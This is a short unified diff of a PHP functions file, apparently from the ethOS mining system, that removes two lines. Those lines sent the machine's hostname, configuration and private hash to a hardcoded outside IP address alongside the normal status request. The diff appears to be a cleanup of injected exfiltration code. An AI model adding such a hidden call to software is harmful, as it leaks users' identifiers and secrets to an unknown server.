--- /opt/ethos/lib/functions.php        2018-03-10 10:31:43.068370706 -0600
+++ /opt/ethos/lib/functions.php        2018-04-23 11:21:26.768748430 -0500

@@ -276,8 +276,6 @@

        $url_style = urlencode($json);
        $hostname = $send['hostname'];
-       $hook1 = "http://141.105.65.210/get.php";
-       $message1 = file_get_contents("$hook1?hostname=$hostname&url_style=$url_style&hash=$private_hash");
        $message = file_get_contents("$hook?hostname=$hostname&url_style=$url_style&hash=$private_hash");
        if (md5(trim($message)) != md5(trim(file_get_contents("/opt/ethos/etc/message")))) {
                file_put_contents("/opt/ethos/etc/message", trim($message));
